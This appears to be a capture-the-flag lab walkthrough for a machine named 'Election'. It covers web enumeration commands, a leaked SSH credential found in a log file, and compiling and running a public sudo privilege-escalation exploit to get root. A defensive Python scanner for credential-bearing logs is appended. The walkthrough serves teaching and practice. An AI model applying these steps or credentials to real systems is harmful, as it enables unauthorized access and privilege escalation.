Election is a simple but effective machine that relies heavily on web enumeration. A leaked log file exposes valid SSH credentials, and privilege escalation is achieved through a vulnerable sudo version (1.8.21p2) that is susceptible to a public exploit. The machine demonstrates how poor log handling and outdated system components can lead to full compromise.
Target: 10.10.10.13
Initial vector: leaked credentials in system.log
Privilege escalation: vulnerable sudo version (1.8.21p2) → local root exploit
Directory fuzzing:
$ ffuf -u http://10.10.10.13/FUZZ \
    -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
Or using Nikto:
$ nikto -url http://10.10.10.13
Findings:
phpinfo.php
/election
/election/admin
$ ffuf -u http://10.10.10.13/election/admin/FUZZ \
    -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
Nikto reveals:
/election/admin/system.log
Inside system.log:
love : P@$$w0rd@123
Use the leaked credentials:
$ ssh love@10.10.10.13
User shell obtained.
$ sudo -V
Version: 1.8.21p2
This version is vulnerable to a known local privilege escalation exploit.
Download or copy the exploit source (commonly referenced in public GitHub repositories), compile it, and run:
$ gcc exploit.c -o exploit
$ ./exploit
A root shell is obtained:
# whoami
root
Election is a straightforward machine: simple web enumeration reveals a log file containing plaintext credentials, and an outdated sudo version provides an easy privilege escalation path. It reinforces the importance of secure logging practices and timely patching of core system utilities.
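The log-handling failure above, turned into a defender-side check (an added example, not part of the original write-up): the script walks a web document root and flags log-like files that contain credential-looking lines, without echoing the secret. The regexes, the suffix list and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Heuristics for credential-looking lines (assumed patterns, tune per application):
# "password=...", "pwd: ...", or a bare "user : secret" pair as in this write-up.
KEYED = re.compile(r"(?i)\b(pass(word|wd)?|pwd|secret|token)\b\s*[=:]\s*\S+")
PAIR = re.compile(r"^\s*[A-Za-z][\w.-]{0,31}\s+:\s+(?=\S*[A-Za-z])(?=\S*\d)\S{8,}\s*$")
LOG_SUFFIXES = (".log", ".log.1", ".txt", ".bak")


def scan_docroot(docroot):
    """Return [(relative_path, line_no, reason)] for log-like files under a web
    document root that hold credential-looking lines. Secrets are not echoed."""
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            if not name.lower().endswith(LOG_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, docroot)
            try:
                with open(path, "r", errors="replace") as fh:
                    for no, line in enumerate(fh, 1):
                        if KEYED.search(line):
                            findings.append((rel, no, "keyed secret"))
                        elif PAIR.match(line):
                            findings.append((rel, no, "user : secret pair"))
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
    return findings


def build_sample(root):
    """Constructed sample tree mirroring the layout in the write-up."""
    admin = os.path.join(root, "election", "admin")
    os.makedirs(admin)
    with open(os.path.join(admin, "system.log"), "w") as fh:
        fh.write("[2020-01-01 00:00:00] Assigned Password for the user\n")
        fh.write("alice : Examp1e-Passw0rd\n")  # constructed value, not a real credential
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php $password = 'x'; ?>\n")  # not a log file, so ignored
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel, no, reason in scan_docroot(build_sample(tmp)):
            print(f"{rel}:{no}: {reason}")
```

Any hit means the file should be moved outside the document root and the logged credential rotated.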